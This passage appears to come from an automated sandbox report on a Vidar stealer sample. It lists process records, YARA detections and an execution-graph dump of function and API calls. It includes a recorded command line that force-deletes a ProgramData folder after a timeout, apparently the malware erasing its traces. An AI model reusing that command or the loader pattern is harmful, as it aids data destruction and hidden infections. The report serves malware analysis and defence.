                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Yara matches:
                                                                                  • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000000.00000002.2105271652.00000000003A7000.00000004.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                  Reputation:low
                                                                                  Has exited:true

                                                                                  General

                                                                                  Target ID:1
                                                                                  Start time:11:46:53
                                                                                  Start date:24/05/2024
                                                                                  Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                                                  Imagebase:0x870000
                                                                                  File size:65'440 bytes
                                                                                  MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Yara matches:
                                                                                  • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000001.00000002.2525936696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation, Description: Detects executables containing potential Windows Defender anti-emulation checks, Source: 00000001.00000002.2525936696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                                  • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000001.00000002.2526755030.000000000116E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                  Reputation:high
                                                                                  Has exited:true

                                                                                  General

                                                                                  Target ID:6
                                                                                  Start time:11:47:35
                                                                                  Start date:24/05/2024
                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:"C:\Windows\System32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\KECBFBAEBKJJ" & exit
                                                                                  Imagebase:0x1c0000
                                                                                  File size:236'544 bytes
                                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high
                                                                                  Has exited:true

                                                                                  General

                                                                                  Target ID:7
                                                                                  Start time:11:47:35
                                                                                  Start date:24/05/2024
                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                  Imagebase:0x7ff66e660000
                                                                                  File size:862'208 bytes
                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high
                                                                                  Has exited:true

                                                                                  General

                                                                                  Target ID:8
                                                                                  Start time:11:47:35
                                                                                  Start date:24/05/2024
                                                                                  Path:C:\Windows\SysWOW64\timeout.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:timeout /t 10
                                                                                  Imagebase:0x720000
                                                                                  File size:25'088 bytes
                                                                                  MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high
                                                                                  Has exited:true

                                                                                  Disassembly

                                                                                  Reset < >

                                                                                    Execution Graph

                                                                                    Execution Coverage:4.4%
                                                                                    Dynamic/Decrypted Code Coverage:0.5%
                                                                                    Signature Coverage:1.7%
                                                                                    Total number of Nodes:1468
                                                                                    Total number of Limit Nodes:18
                                                                                    execution_graph 15069 383c37 15072 383bb8 15069->15072 15071 383c42 error_info_injector 15077 383d18 15072->15077 15075 383bd6 15075->15071 15076 38a6c6 _Yarn 14 API calls 15076->15075 15084 383aa8 15077->15084 15079 38a6c6 _Yarn 14 API calls 15080 383d7c 15079->15080 15090 383b00 15080->15090 15082 383bc7 15082->15075 15082->15076 15085 383abe 15084->15085 15086 383ab7 15084->15086 15088 383abc 15085->15088 15102 38431b EnterCriticalSection 15085->15102 15097 38a781 15086->15097 15088->15079 15091 383b0a 15090->15091 15092 38a78f 15090->15092 15094 383b1d 15091->15094 15154 384329 LeaveCriticalSection 15091->15154 15155 38a76a LeaveCriticalSection 15092->15155 15094->15082 15095 38a796 15095->15082 15103 38f58b 15097->15103 15102->15088 15124 38ef3a 15103->15124 15123 38f5bd 15123->15123 15125 38f123 std::_Lockit::_Lockit 5 API calls 15124->15125 15126 38ef50 15125->15126 15127 38ef54 15126->15127 15128 38f123 std::_Lockit::_Lockit 5 API calls 15127->15128 15129 38ef6a 15128->15129 15130 38ef6e 15129->15130 15131 38f123 std::_Lockit::_Lockit 5 API calls 15130->15131 15132 38ef84 15131->15132 15133 38ef88 15132->15133 15134 38f123 std::_Lockit::_Lockit 5 API calls 15133->15134 15135 38ef9e 15134->15135 15136 38efa2 15135->15136 15137 38f123 std::_Lockit::_Lockit 5 API calls 15136->15137 15138 38efb8 15137->15138 15139 38efbc 15138->15139 15140 38f123 std::_Lockit::_Lockit 5 API calls 15139->15140 15141 38efd2 15140->15141 15142 38efd6 15141->15142 15143 38f123 std::_Lockit::_Lockit 5 API calls 15142->15143 15144 38efec 15143->15144 15145 38eff0 15144->15145 15146 38f123 std::_Lockit::_Lockit 5 API calls 15145->15146 15147 38f006 15146->15147 15148 38f024 15147->15148 15149 38f123 std::_Lockit::_Lockit 5 API calls 15148->15149 15150 38f03a 15149->15150 15151 38f00a 15150->15151 15152 38f123 std::_Lockit::_Lockit 5 API calls 15151->15152 15153 38f020 15152->15153 15153->15123 15154->15094 15155->15095 17042 38c718 17045 38c3e4 17042->17045 17046 38c3f0 ___scrt_is_nonwritable_in_current_image 17045->17046 17053 38a722 EnterCriticalSection 17046->17053 17048 38c428 17054 38c446 17048->17054 17049 38c3fa 17049->17048 17051 39676b __Getctype 14 API calls 17049->17051 17051->17049 17053->17049 17057 38a76a LeaveCriticalSection 17054->17057 17056 38c434 17057->17056 15172 38101f 15173 381028 15172->15173 15180 382243 15173->15180 15175 381037 15186 382b1c 15175->15186 15181 38224f __EH_prolog3 15180->15181 15182 38479f std::_Facet_Register 43 API calls 15181->15182 15183 382284 15182->15183 15185 382295 std::ios_base::_Init 15183->15185 15193 383c8b 15183->15193 15185->15175 15188 382b3b 15186->15188 15187 38104b 15190 384a41 15187->15190 15188->15187 15237 38918c 15188->15237 15244 384a14 15190->15244 15194 383c97 __EH_prolog3 15193->15194 15195 383aa8 std::_Lockit::_Lockit 7 API calls 15194->15195 15196 383ca2 15195->15196 15197 383cd3 15196->15197 15205 383dee 15196->15205 15199 383b00 std::_Lockit::~_Lockit 2 API calls 15197->15199 15203 383d10 std::ios_base::_Init 15199->15203 15200 383cb5 15211 383e11 15200->15211 15203->15185 15206 38479f std::_Facet_Register 43 API calls 15205->15206 15207 383df9 15206->15207 15208 383e0d 15207->15208 15221 383b1f 15207->15221 15208->15200 15212 383e1d 15211->15212 15213 383cbd 15211->15213 15224 3842c9 15212->15224 15215 383be3 15213->15215 15216 383bf1 15215->15216 15220 383c1c ctype 15215->15220 15217 383bfd 15216->15217 15218 38a6c6 _Yarn 14 API calls 15216->15218 15219 38a798 _Yarn 15 API calls 15217->15219 15217->15220 15218->15217 15219->15220 15220->15197 15222 383be3 _Yarn 15 API calls 15221->15222 15223 383b59 15222->15223 15223->15200 15225 3842d9 EncodePointer 15224->15225 15226 38b0a7 15224->15226 15225->15213 15225->15226 15227 392dfa __CreateFrameInfo 2 API calls 15226->15227 15228 38b0ac 15227->15228 15229 392e3f __CreateFrameInfo 41 API calls 15228->15229 15233 38b0b7 15228->15233 15229->15233 15230 38b0c1 IsProcessorFeaturePresent 15234 38b0cd 15230->15234 15231 38b0e0 15232 38c29e __CreateFrameInfo 23 API calls 15231->15232 15235 38b0ea 15232->15235 15233->15230 15233->15231 15236 388e0b __CreateFrameInfo 8 API calls 15234->15236 15236->15231 15238 389198 15237->15238 15239 3891ad 15237->15239 15240 38b188 __dosmaperr 14 API calls 15238->15240 15239->15187 15241 38919d 15240->15241 15242 389007 __strnicoll 41 API calls 15241->15242 15243 3891a8 15242->15243 15243->15187 15245 384a2a 15244->15245 15246 384a23 15244->15246 15253 38de5b 15245->15253 15250 38ddde 15246->15250 15249 381055 15251 38de5b 44 API calls 15250->15251 15252 38ddf0 15251->15252 15252->15249 15256 38dba7 15253->15256 15257 38dbb3 ___scrt_is_nonwritable_in_current_image 15256->15257 15264 38a722 EnterCriticalSection 15257->15264 15259 38dbc1 15265 38dc02 15259->15265 15261 38dbce 15275 38dbf6 15261->15275 15264->15259 15266 38dc90 std::_Lockit::_Lockit 15265->15266 15267 38dc1d 15265->15267 15266->15261 15267->15266 15274 38dc70 15267->15274 15278 397a10 15267->15278 15268 397a10 44 API calls 15270 38dc86 15268->15270 15272 38ee48 ___free_lconv_mon 14 API calls 15270->15272 15271 38dc66 15273 38ee48 ___free_lconv_mon 14 API calls 15271->15273 15272->15266 15273->15274 15274->15266 15274->15268 15306 38a76a LeaveCriticalSection 15275->15306 15277 38dbdf 15277->15249 15279 397a38 15278->15279 15280 397a1d 15278->15280 15282 397a47 15279->15282 15287 39923f 15279->15287 15280->15279 15281 397a29 15280->15281 15283 38b188 __dosmaperr 14 API calls 15281->15283 15294 393a16 15282->15294 15286 397a2e __fread_nolock 15283->15286 15286->15271 15288 39924a 15287->15288 15289 39925f HeapSize 15287->15289 15290 38b188 __dosmaperr 14 API calls 15288->15290 15289->15282 15291 39924f 15290->15291 15292 389007 __strnicoll 41 API calls 15291->15292 15293 39925a 15292->15293 15293->15282 15295 393a2e 15294->15295 15296 393a23 15294->15296 15298 393a36 15295->15298 15304 393a3f __dosmaperr 15295->15304 15297 391e71 std::_Locinfo::_Locinfo_dtor 15 API calls 15296->15297 15303 393a2b 15297->15303 15299 38ee48 ___free_lconv_mon 14 API calls 15298->15299 15299->15303 15300 393a69 HeapReAlloc 15300->15303 15300->15304 15301 393a44 15302 38b188 __dosmaperr 14 API calls 15301->15302 15302->15303 15303->15286 15304->15300 15304->15301 15305 38dac3 std::_Facet_Register 2 API calls 15304->15305 15305->15304 15306->15277 15318 381000 15323 3821db 15318->15323 15320 381013 15321 384a41 44 API calls 15320->15321 15322 38101d 15321->15322 15324 3821e7 __EH_prolog3 15323->15324 15327 382f32 15324->15327 15326 382239 std::ios_base::_Init 15326->15320 15336 382bd6 15327->15336 15329 382f3d 15344 38358f 15329->15344 15331 382f50 15332 382f69 15331->15332 15333 3814f1 std::ios_base::_Init 43 API calls 15331->15333 15334 382f75 15332->15334 15348 384121 15332->15348 15333->15332 15334->15326 15337 382be2 __EH_prolog3 15336->15337 15338 3814f1 std::ios_base::_Init 43 API calls 15337->15338 15339 382c13 15338->15339 15340 38479f std::_Facet_Register 43 API calls 15339->15340 15341 382c1a 15340->15341 15342 383c8b std::ios_base::_Init 47 API calls 15341->15342 15343 382c2b std::ios_base::_Init 15341->15343 15342->15343 15343->15329 15345 38359b __EH_prolog3 15344->15345 15353 382121 15345->15353 15347 3835b3 std::ios_base::_Ios_base_dtor std::ios_base::_Init 15347->15331 15349 383aa8 std::_Lockit::_Lockit 7 API calls 15348->15349 15350 384131 15349->15350 15351 383b00 std::_Lockit::~_Lockit 2 API calls 15350->15351 15352 38416f 15351->15352 15352->15334 15354 38212d __EH_prolog3 15353->15354 15355 383aa8 std::_Lockit::_Lockit 7 API calls 15354->15355 15356 382137 15355->15356 15369 3825ec 15356->15369 15358 38214e 15368 382161 15358->15368 15375 382a70 15358->15375 15359 383b00 std::_Lockit::~_Lockit 2 API calls 15360 3821a8 std::ios_base::_Init 15359->15360 15360->15347 15362 382171 15363 382178 15362->15363 15364 3821b0 15362->15364 15385 383c59 15363->15385 15388 382d20 15364->15388 15368->15359 15370 3825f8 15369->15370 15371 38261c 15369->15371 15372 383aa8 std::_Lockit::_Lockit 7 API calls 15370->15372 15371->15358 15373 382602 15372->15373 15374 383b00 std::_Lockit::~_Lockit 2 API calls 15373->15374 15374->15371 15377 382a7c __EH_prolog3 15375->15377 15376 382acd std::ios_base::_Init 15376->15362 15377->15376 15378 38479f std::_Facet_Register 43 API calls 15377->15378 15381 382a95 codecvt 15378->15381 15379 382abc 15379->15376 15407 382506 15379->15407 15381->15379 15392 38232a 15381->15392 15383 382ab1 15404 3822b4 15383->15404 15386 38479f std::_Facet_Register 43 API calls 15385->15386 15387 383c64 15386->15387 15387->15368 15389 382d2e Concurrency::cancel_current_task 15388->15389 15390 385ad1 CallUnexpected RaiseException 15389->15390 15391 382d3c 15390->15391 15393 382336 __EH_prolog3 15392->15393 15394 383aa8 std::_Lockit::_Lockit 7 API calls 15393->15394 15395 382343 15394->15395 15396 38238c 15395->15396 15397 382377 15395->15397 15433 383a36 15396->15433 15424 383d89 15397->15424 15400 382380 std::ios_base::_Init 15400->15383 15480 383e9e 15404->15480 15525 383dd4 15407->15525 15410 38a6c6 _Yarn 14 API calls 15412 382541 15410->15412 15411 382554 15414 382565 15411->15414 15415 38a6c6 _Yarn 14 API calls 15411->15415 15412->15411 15413 38a6c6 _Yarn 14 API calls 15412->15413 15413->15411 15416 382576 15414->15416 15418 38a6c6 _Yarn 14 API calls 15414->15418 15415->15414 15417 382587 15416->15417 15419 38a6c6 _Yarn 14 API calls 15416->15419 15420 382598 15417->15420 15421 38a6c6 _Yarn 14 API calls 15417->15421 15418->15416 15419->15417 15422 383b00 std::_Lockit::~_Lockit 2 API calls 15420->15422 15421->15420 15423 3825a3 15422->15423 15423->15376 15438 38a9f8 15424->15438 15427 383be3 _Yarn 15 API calls 15429 383dad 15427->15429 15428 383dbd 15431 383be3 _Yarn 15 API calls 15428->15431 15429->15428 15430 38a9f8 std::_Locinfo::_Locinfo_dtor 69 API calls 15429->15430 15430->15428 15432 383dd1 15431->15432 15432->15400 15477 3839f7 15433->15477 15436 385ad1 CallUnexpected RaiseException 15437 383a55 15436->15437 15439 38f58b std::_Lockit::_Lockit 5 API calls 15438->15439 15440 38aa05 15439->15440 15443 38a7a3 15440->15443 15444 38a7af ___scrt_is_nonwritable_in_current_image 15443->15444 15451 38a722 EnterCriticalSection 15444->15451 15446 38a7bd 15452 38a7fe 15446->15452 15451->15446 15453 38a95d std::_Locinfo::_Locinfo_dtor 69 API calls 15452->15453 15454 38a819 15453->15454 15455 38eb00 __Getctype 41 API calls 15454->15455 15472 38a7ca 15454->15472 15456 38a826 15455->15456 15457 39252c std::_Locinfo::_Locinfo_dtor 43 API calls 15456->15457 15458 38a84b 15457->15458 15459 391e71 std::_Locinfo::_Locinfo_dtor 15 API calls 15458->15459 15460 38a852 15458->15460 15461 38a877 15459->15461 15462 389034 _Deallocate 11 API calls 15460->15462 15460->15472 15464 39252c std::_Locinfo::_Locinfo_dtor 43 API calls 15461->15464 15461->15472 15463 38a95c 15462->15463 15465 38a893 15464->15465 15466 38a89a 15465->15466 15467 38a8b5 15465->15467 15466->15460 15468 38a8ac 15466->15468 15470 38ee48 ___free_lconv_mon 14 API calls 15467->15470 15471 38a8e0 15467->15471 15469 38ee48 ___free_lconv_mon 14 API calls 15468->15469 15469->15472 15470->15471 15471->15472 15473 38ee48 ___free_lconv_mon 14 API calls 15471->15473 15474 38a7f2 15472->15474 15473->15472 15475 38a76a std::_Lockit::~_Lockit LeaveCriticalSection 15474->15475 15476 383d95 15475->15476 15476->15427 15478 3810d0 std::exception::exception 42 API calls 15477->15478 15479 383a09 15478->15479 15479->15436 15492 38ab94 15480->15492 15482 383ea7 __Getctype 15483 383edf 15482->15483 15484 383ec1 15482->15484 15486 38aa30 __Getctype 41 API calls 15483->15486 15497 38aa30 15484->15497 15487 383ec8 15486->15487 15502 38abb9 15487->15502 15490 3822d7 15490->15379 15493 38eb00 __Getctype 41 API calls 15492->15493 15494 38ab9f 15493->15494 15495 39256a __Getctype 41 API calls 15494->15495 15496 38abaf 15495->15496 15496->15482 15498 38eb00 __Getctype 41 API calls 15497->15498 15499 38aa3b 15498->15499 15500 39256a __Getctype 41 API calls 15499->15500 15501 38aa4b 15500->15501 15501->15487 15503 38eb00 __Getctype 41 API calls 15502->15503 15504 38abc4 15503->15504 15505 39256a __Getctype 41 API calls 15504->15505 15506 383ef0 15505->15506 15506->15490 15507 38b048 15506->15507 15508 38b055 15507->15508 15513 38b090 15507->15513 15509 38a798 _Yarn 15 API calls 15508->15509 15510 38b078 15509->15510 15510->15513 15516 392cc8 15510->15516 15513->15490 15514 389034 _Deallocate 11 API calls 15515 38b0a6 15514->15515 15517 392ce4 15516->15517 15518 392cd6 15516->15518 15519 38b188 __dosmaperr 14 API calls 15517->15519 15518->15517 15523 392cfe 15518->15523 15520 392cee 15519->15520 15521 389007 __strnicoll 41 API calls 15520->15521 15522 38b089 15521->15522 15522->15513 15522->15514 15523->15522 15524 38b188 __dosmaperr 14 API calls 15523->15524 15524->15520 15526 382532 15525->15526 15527 383de0 15525->15527 15526->15410 15526->15412 15528 38a9f8 std::_Locinfo::_Locinfo_dtor 69 API calls 15527->15528 15528->15526 13592 384605 13593 384611 ___scrt_is_nonwritable_in_current_image 13592->13593 13618 38487b 13593->13618 13595 384618 13596 384771 13595->13596 13606 384642 ___scrt_is_nonwritable_in_current_image __CreateFrameInfo ___scrt_release_startup_lock 13595->13606 13668 384e26 IsProcessorFeaturePresent 13596->13668 13598 384778 13648 38c2da 13598->13648 13603 384661 13604 3846e2 13626 38bf18 13604->13626 13606->13603 13606->13604 13651 38c2b4 13606->13651 13608 3846e8 13630 39c217 13608->13630 13613 38470d 13614 384716 13613->13614 13659 38c28f 13613->13659 13662 3849ec 13614->13662 13619 384884 13618->13619 13675 384b4c IsProcessorFeaturePresent 13619->13675 13623 384895 13624 384899 13623->13624 13685 38789d 13623->13685 13624->13595 13627 38bf21 13626->13627 13629 38bf26 13626->13629 13745 38bc72 13627->13745 13629->13608 14406 38172b 13630->14406 13632 39c22f GetModuleHandleA 14414 3815b7 13632->14414 13634 39c249 _strlen 14418 38166a 13634->14418 13636 39c25f _strlen 13637 38166a std::ios_base::_Init 43 API calls 13636->13637 13638 39c275 GetProcAddress 13637->13638 13639 39c290 VirtualAlloc 13638->13639 14422 39c000 13639->14422 13641 39c2ad ctype 14428 39c0a0 13641->14428 13646 384791 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 13647 3846ff 13646->13647 13657 384f40 GetModuleHandleW 13647->13657 14652 38c0c2 13648->14652 13652 38c2ca ___scrt_is_nonwritable_in_current_image std::_Lockit::_Lockit 13651->13652 13652->13604 13653 38eb00 __Getctype 41 API calls 13652->13653 13656 38e03b 13653->13656 13654 38b0a7 __purecall 41 API calls 13655 38e065 13654->13655 13656->13654 13658 384709 13657->13658 13658->13598 13658->13613 13660 38c0c2 __CreateFrameInfo 23 API calls 13659->13660 13661 38c29a 13660->13661 13661->13614 13663 3849f8 13662->13663 13664 38471f 13663->13664 14729 38df9b 13663->14729 13664->13603 13666 384a06 13667 38789d ___scrt_uninitialize_crt 7 API calls 13666->13667 13667->13664 13669 384e3c __fread_nolock __CreateFrameInfo 13668->13669 13670 384ee7 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 13669->13670 13671 384f2b __CreateFrameInfo 13670->13671 13671->13598 13672 38c29e 13673 38c0c2 __CreateFrameInfo 23 API calls 13672->13673 13674 384786 13673->13674 13676 384890 13675->13676 13677 38787e 13676->13677 13691 388957 13677->13691 13680 387887 13680->13623 13682 38788f 13683 38789a 13682->13683 13705 388993 13682->13705 13683->13623 13686 3878b0 13685->13686 13687 3878a6 13685->13687 13686->13624 13688 387a16 ___vcrt_uninitialize_ptd 6 API calls 13687->13688 13689 3878ab 13688->13689 13690 388993 ___vcrt_uninitialize_locks DeleteCriticalSection 13689->13690 13690->13686 13692 388960 13691->13692 13694 388989 13692->13694 13695 387883 13692->13695 13709 388b9c 13692->13709 13696 388993 ___vcrt_uninitialize_locks DeleteCriticalSection 13694->13696 13695->13680 13697 3879e3 13695->13697 13696->13695 13726 388aad 13697->13726 13700 3879f8 13700->13682 13703 387a13 13703->13682 13706 3889bd 13705->13706 13707 38899e 13705->13707 13706->13680 13708 3889a8 DeleteCriticalSection 13707->13708 13708->13706 13708->13708 13714 3889c2 13709->13714 13712 388bd4 InitializeCriticalSectionAndSpinCount 13713 388bbf 13712->13713 13713->13692 13715 3889df 13714->13715 13718 3889e3 13714->13718 13715->13712 13715->13713 13717 388a4b GetProcAddress 13717->13715 13718->13715 13718->13717 13719 388a3c 13718->13719 13721 388a62 LoadLibraryExW 13718->13721 13719->13717 13720 388a44 FreeLibrary 13719->13720 13720->13717 13722 388a79 GetLastError 13721->13722 13723 388aa9 13721->13723 13722->13723 13724 388a84 ___vcrt_FlsFree 13722->13724 13723->13718 13724->13723 13725 388a9a LoadLibraryExW 13724->13725 13725->13718 13727 3889c2 ___vcrt_FlsFree 5 API calls 13726->13727 13728 388ac7 13727->13728 13729 388ae0 TlsAlloc 13728->13729 13730 3879ed 13728->13730 13730->13700 13731 388b5e 13730->13731 13732 3889c2 ___vcrt_FlsFree 5 API calls 13731->13732 13733 388b78 13732->13733 13734 388b93 TlsSetValue 13733->13734 13735 387a06 13733->13735 13734->13735 13735->13703 13736 387a16 13735->13736 13737 387a26 13736->13737 13738 387a20 13736->13738 13737->13700 13740 388ae8 13738->13740 13741 3889c2 ___vcrt_FlsFree 5 API calls 13740->13741 13742 388b02 13741->13742 13743 388b1a TlsFree 13742->13743 13744 388b0e 13742->13744 13743->13744 13744->13737 13746 38bc7b 13745->13746 13749 38bc91 13745->13749 13746->13749 13751 38bc9e 13746->13751 13748 38bc88 13748->13749 13768 38be09 13748->13768 13749->13629 13752 38bcaa 13751->13752 13753 38bca7 13751->13753 13776 394d54 13752->13776 13753->13748 13758 38bcbb 13803 38ee48 13758->13803 13759 38bcc7 13809 38bcf8 13759->13809 13764 38ee48 ___free_lconv_mon 14 API calls 13765 38bceb 13764->13765 13766 38ee48 ___free_lconv_mon 14 API calls 13765->13766 13767 38bcf1 13766->13767 13767->13748 13769 38be7a 13768->13769 13772 38be18 13768->13772 13769->13749 13770 393ca4 WideCharToMultiByte std::_Locinfo::_Locinfo_dtor 13770->13772 13771 38edeb __dosmaperr 14 API calls 13771->13772 13772->13769 13772->13770 13772->13771 13774 38be7e 13772->13774 13775 38ee48 ___free_lconv_mon 14 API calls 13772->13775 13773 38ee48 ___free_lconv_mon 14 API calls 13773->13769 13774->13773 13775->13772 13777 38bcb0 13776->13777 13778 394d5d 13776->13778 13782 395056 GetEnvironmentStringsW 13777->13782 13831 38ebbb 13778->13831 13783 39506e 13782->13783 13784 38bcb5 13782->13784 13785 393ca4 std::_Locinfo::_Locinfo_dtor WideCharToMultiByte 13783->13785 13784->13758 13784->13759 13786 39508b 13785->13786 13787 3950a0 13786->13787 13788 395095 FreeEnvironmentStringsW 13786->13788 13789 391e71 std::_Locinfo::_Locinfo_dtor 15 API calls 13787->13789 13788->13784 13790 3950a7 13789->13790 13791 3950af 13790->13791 13792 3950c0 13790->13792 13794 38ee48 ___free_lconv_mon 14 API calls 13791->13794 13793 393ca4 std::_Locinfo::_Locinfo_dtor WideCharToMultiByte 13792->13793 13795 3950d0 13793->13795 13796 3950b4 FreeEnvironmentStringsW 13794->13796 13797 3950df 13795->13797 13798 3950d7 13795->13798 13796->13784 13800 38ee48 ___free_lconv_mon 14 API calls 13797->13800 13799 38ee48 ___free_lconv_mon 14 API calls 13798->13799 13801 3950dd FreeEnvironmentStringsW 13799->13801 13800->13801 13801->13784 13804 38bcc1 13803->13804 13805 38ee53 HeapFree 13803->13805 13804->13748 13805->13804 13806 38ee68 GetLastError 13805->13806 13807 38ee75 __dosmaperr 13806->13807 13808 38b188 __dosmaperr 12 API calls 13807->13808 13808->13804 13810 38bd0d 13809->13810 13811 38edeb __dosmaperr 14 API calls 13810->13811 13812 38bd34 13811->13812 13813 38bd3c 13812->13813 13822 38bd46 13812->13822 13814 38ee48 ___free_lconv_mon 14 API calls 13813->13814 13830 38bcce 13814->13830 13815 38bda3 13816 38ee48 ___free_lconv_mon 14 API calls 13815->13816 13816->13830 13817 38edeb __dosmaperr 14 API calls 13817->13822 13818 38bdb2 14396 38bdda 13818->14396 13822->13815 13822->13817 13822->13818 13824 38bdcd 13822->13824 13826 38ee48 ___free_lconv_mon 14 API calls 13822->13826 14387 38e066 13822->14387 13823 38ee48 ___free_lconv_mon 14 API calls 13825 38bdbf 13823->13825 14402 389034 IsProcessorFeaturePresent 13824->14402 13828 38ee48 ___free_lconv_mon 14 API calls 13825->13828 13826->13822 13828->13830 13829 38bdd9 13830->13764 13832 38ebc6 13831->13832 13836 38ebcc 13831->13836 13882 38f334 13832->13882 13838 38ebd2 13836->13838 13887 38f373 13836->13887 13837 38ebea 13892 38edeb 13837->13892 13841 38ebd7 13838->13841 13904 38b0a7 13838->13904 13859 394b5f 13841->13859 13844 38ebfe 13846 38f373 __dosmaperr 6 API calls 13844->13846 13845 38ec13 13847 38f373 __dosmaperr 6 API calls 13845->13847 13848 38ec0a 13846->13848 13849 38ec1f 13847->13849 13853 38ee48 ___free_lconv_mon 14 API calls 13848->13853 13850 38ec32 13849->13850 13851 38ec23 13849->13851 13899 38e92e 13850->13899 13854 38f373 __dosmaperr 6 API calls 13851->13854 13856 38ec10 13853->13856 13854->13848 13856->13838 13857 38ee48 ___free_lconv_mon 14 API calls 13858 38ec44 13857->13858 13858->13841 14187 394cb4 13859->14187 13864 394ba2 13864->13777 13867 394bc9 14214 394daf 13867->14214 13868 394bbb 13869 38ee48 ___free_lconv_mon 14 API calls 13868->13869 13869->13864 13872 394c01 13873 38b188 __dosmaperr 14 API calls 13872->13873 13874 394c06 13873->13874 13875 38ee48 ___free_lconv_mon 14 API calls 13874->13875 13875->13864 13876 394c1c 13879 38ee48 ___free_lconv_mon 14 API calls 13876->13879 13881 394c48 13876->13881 13878 38ee48 ___free_lconv_mon 14 API calls 13878->13864 13879->13881 13880 394c91 13880->13878 13881->13880 14225 3947d1 13881->14225 13915 38f123 13882->13915 13885 38f359 13885->13836 13886 38f36b TlsGetValue 13888 38f123 std::_Lockit::_Lockit 5 API calls 13887->13888 13889 38f38f 13888->13889 13890 38ebe6 13889->13890 13891 38f3ad TlsSetValue 13889->13891 13890->13837 13890->13838 13897 38edf8 __dosmaperr 13892->13897 13893 38ee38 13933 38b188 13893->13933 13894 38ee23 HeapAlloc 13895 38ebf6 13894->13895 13894->13897 13895->13844 13895->13845 13897->13893 13897->13894 13930 38dac3 13897->13930 13970 38e7c2 13899->13970 14072 392dfa 13904->14072 13908 38b0c1 IsProcessorFeaturePresent 13912 38b0cd 13908->13912 13909 38b0e0 13910 38c29e __CreateFrameInfo 23 API calls 13909->13910 13913 38b0ea 13910->13913 13911 38b0b7 13911->13908 13911->13909 14102 388e0b 13912->14102 13916 38f14d 13915->13916 13917 38f151 13915->13917 13916->13885 13916->13886 13917->13916 13922 38f058 13917->13922 13920 38f16b GetProcAddress 13920->13916 13921 38f17b std::_Lockit::_Lockit 13920->13921 13921->13916 13927 38f069 ___vcrt_FlsFree 13922->13927 13923 38f0ff 13923->13916 13923->13920 13924 38f087 LoadLibraryExW 13925 38f0a2 GetLastError 13924->13925 13926 38f106 13924->13926 13925->13927 13926->13923 13928 38f118 FreeLibrary 13926->13928 13927->13923 13927->13924 13929 38f0d5 LoadLibraryExW 13927->13929 13928->13923 13929->13926 13929->13927 13936 38daf0 13930->13936 13947 38ec51 GetLastError 13933->13947 13935 38b18d 13935->13895 13937 38dafc ___scrt_is_nonwritable_in_current_image 13936->13937 13942 38a722 EnterCriticalSection 13937->13942 13939 38db07 13943 38db43 13939->13943 13942->13939 13946 38a76a LeaveCriticalSection 13943->13946 13945 38dace 13945->13897 13946->13945 13948 38ec6d 13947->13948 13949 38ec67 13947->13949 13951 38f373 __dosmaperr 6 API calls 13948->13951 13953 38ec71 SetLastError 13948->13953 13950 38f334 __dosmaperr 6 API calls 13949->13950 13950->13948 13952 38ec89 13951->13952 13952->13953 13955 38edeb __dosmaperr 12 API calls 13952->13955 13953->13935 13956 38ec9e 13955->13956 13957 38eca6 13956->13957 13958 38ecb7 13956->13958 13959 38f373 __dosmaperr 6 API calls 13957->13959 13960 38f373 __dosmaperr 6 API calls 13958->13960 13968 38ecb4 13959->13968 13961 38ecc3 13960->13961 13962 38ecde 13961->13962 13963 38ecc7 13961->13963 13964 38e92e __dosmaperr 12 API calls 13962->13964 13965 38f373 __dosmaperr 6 API calls 13963->13965 13967 38ece9 13964->13967 13965->13968 13966 38ee48 ___free_lconv_mon 12 API calls 13966->13953 13969 38ee48 ___free_lconv_mon 12 API calls 13967->13969 13968->13966 13969->13953 13971 38e7ce ___scrt_is_nonwritable_in_current_image 13970->13971 13984 38a722 EnterCriticalSection 13971->13984 13973 38e7d8 13985 38e808 13973->13985 13976 38e8d4 13977 38e8e0 ___scrt_is_nonwritable_in_current_image 13976->13977 13989 38a722 EnterCriticalSection 13977->13989 13979 38e8ea 13990 38eab5 13979->13990 13981 38e902 13994 38e922 13981->13994 13984->13973 13988 38a76a LeaveCriticalSection 13985->13988 13987 38e7f6 13987->13976 13988->13987 13989->13979 13991 38eac4 __Getctype 13990->13991 13993 38eaeb __Getctype 13990->13993 13991->13993 13997 39649e 13991->13997 13993->13981 14071 38a76a LeaveCriticalSection 13994->14071 13996 38e910 13996->13857 13998 3964b4 13997->13998 14000 39651e 13997->14000 13998->14000 14003 3964e7 13998->14003 14008 38ee48 ___free_lconv_mon 14 API calls 13998->14008 14001 